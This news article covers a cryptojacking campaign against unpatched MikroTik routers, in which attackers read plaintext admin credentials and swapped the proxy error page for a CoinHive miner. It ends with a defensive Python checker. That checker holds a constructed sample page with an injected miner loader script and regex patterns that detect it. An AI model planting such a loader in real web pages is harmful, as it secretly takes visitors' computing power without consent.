The malware is currently targeting unpatched MikroTik routers in Brazil, but researchers believe it is only a matter of time before it spreads worldwide.
Unpatched routers manufactured by MikroTik have become targets of cryptojacking campaigns in Brazil. According to analysis by Trustwave security researcher Simon Kenin, an unprecedented spike in web-based cryptojacking (in-browser cryptomining) attacks has been observed in Brazil, with over 170,000 routers made by the Latvia-based networking firm MikroTik compromised in the campaign.
Initially, a large number of Brazilian users were targeted as the attackers assembled the compromised routers into a mining botnet, with each infected router serving mining code to the people browsing through it. Routers that were never updated with an available patch are believed to be the main reason such a massive number could be compromised.
According to Simon Kenin's blog post, MikroTik patched a remote access vulnerability in April 2018 that could allow attackers to gain unauthorized access to MikroTik routers remotely. After the fix was released, security researchers published a proof-of-concept (PoC) exploit showing how the flaw could be used to gain access to MikroTik devices, which attackers could then turn against any device that had not yet been updated.
This particular vulnerability has been used in at least three cryptomining attacks, the first of which affected around 183,700 routers. Two subsequent attacks affected 16,000 and 25,000 routers located in Moldova, so the campaign is not limited to any one geographic region, which is the alarming part. That is why security researchers are urging MikroTik router owners to patch their devices immediately: cybercriminals are actively hunting for unpatched routers.
For your information, the April patch was the result of MikroTik's own investigation, in which the flaw was discovered. MikroTik described it as allowing a "special tool to connect to the [administration] port, and request the system user database file." In effect, the flaw lets an attacker read any file off the router, an easy route to stealing data, and the user database file is the most valuable target because MikroTik stores usernames and passwords in it in plaintext.
With that database in hand, an attacker needs no password cracking: the credentials can be read directly and used to log in to the router as a legitimate administrator. The MikroTik admin port is the attack vector in the latest campaigns.
Kenin revealed that the attackers replaced MikroTik's built-in web proxy error page, error.html, which is served whenever the proxy hits an error, with a page that loads CoinHive's in-browser cryptomining script. So you only get cryptojacked while browsing the web through a compromised MikroTik proxy and hitting a proxy error, and the mining stops when you exit the browser.
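Because the injection lives in the proxy's error page, the cheapest check from the client side is to deliberately request a host that cannot exist through the router's proxy and inspect what comes back. The following Python script is an added example for this article, not code from Trustwave or MikroTik. It assumes a hypothetical proxy address and port passed on the command line, matches the public CoinHive loader patterns (the coinhive.com library URL and the CoinHive.Anonymous site-key call), and the two sample error pages are constructed here so the check can be exercised offline.

```python
"""Check a MikroTik web proxy's error page for an injected in-browser miner.

Added example for this article, not Trustwave's or MikroTik's code.  The proxy
host/port are hypothetical command-line inputs; the sample pages below are
constructed for offline use.
"""
import re
import sys
import urllib.error
import urllib.request

# Indicators of an injected CoinHive miner: the library loaded from
# coinhive.com and the CoinHive.Anonymous(<site key>) call that starts it.
# The site key identifies the attacker's CoinHive account, so we capture it.
SCRIPT_RE = re.compile(r"coinhive\.com/lib/coinhive(?:\.min)?\.js", re.I)
CTOR_RE = re.compile(
    r"new\s+CoinHive\.Anonymous\(\s*['\"]([A-Za-z0-9]+)['\"]", re.I
)

# Constructed sample pages: a stock-looking proxy error, and the same page with
# a miner loader injected into <head>.
CLEAN_ERROR_PAGE = """<html><head><title>Proxy error</title></head>
<body><h1>Error: the requested host could not be found</h1></body></html>"""

INJECTED_ERROR_PAGE = """<html><head><title>Proxy error</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('abc123SampleKey');
miner.start();
</script></head>
<body><h1>Error: the requested host could not be found</h1></body></html>"""


def find_miner(html):
    """Return {'script': ..., 'site_key': ...} if a miner is referenced, else None."""
    script = SCRIPT_RE.search(html)
    ctor = CTOR_RE.search(html)
    if script is None and ctor is None:
        return None
    return {
        "script": script.group(0) if script else None,
        "site_key": ctor.group(1) if ctor else None,
    }


def fetch_proxy_error_page(proxy_host, proxy_port, timeout=5.0):
    """Route a request for an unresolvable host through the router's proxy.

    '.invalid' is reserved (RFC 2606) and never resolves, so the proxy has to
    answer with its own error page, the very file the campaign replaced.
    """
    proxy = f"http://{proxy_host}:{proxy_port}"
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({"http": proxy}))
    req = urllib.request.Request(
        "http://does-not-exist.invalid/", headers={"User-Agent": "proxy-error-check"}
    )
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # Proxies normally signal the failure with a 4xx/5xx status but still
        # send error.html as the body; that body is what we want to inspect.
        return err.read().decode("utf-8", "replace")


def check_router(proxy_host, proxy_port):
    """Fetch the live error page from the router's proxy and classify it."""
    return find_miner(fetch_proxy_error_page(proxy_host, proxy_port))


if __name__ == "__main__":
    if len(sys.argv) == 3:
        result = check_router(sys.argv[1], int(sys.argv[2]))
        print("miner reference found:" if result else "error page looks clean", result or "")
    else:
        for name, page in (("clean sample", CLEAN_ERROR_PAGE),
                           ("injected sample", INJECTED_ERROR_PAGE)):
            print(name, "->", find_miner(page))
```

Run it with no arguments to see the two constructed samples classified, or with `<proxy-host> <proxy-port>` to probe a real router. A clean result only says the error page was clean at that moment; the on-device complement is to log in to the router, list its files for an error.html nobody on your team uploaded, and review which users have logged in since the April patch was released.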
Companies often make the mistake of ignoring these kinds of vulnerabilities, and patches are delayed for weeks or months, which helps cybercriminals in more than one way.
Image credit: Depositphotos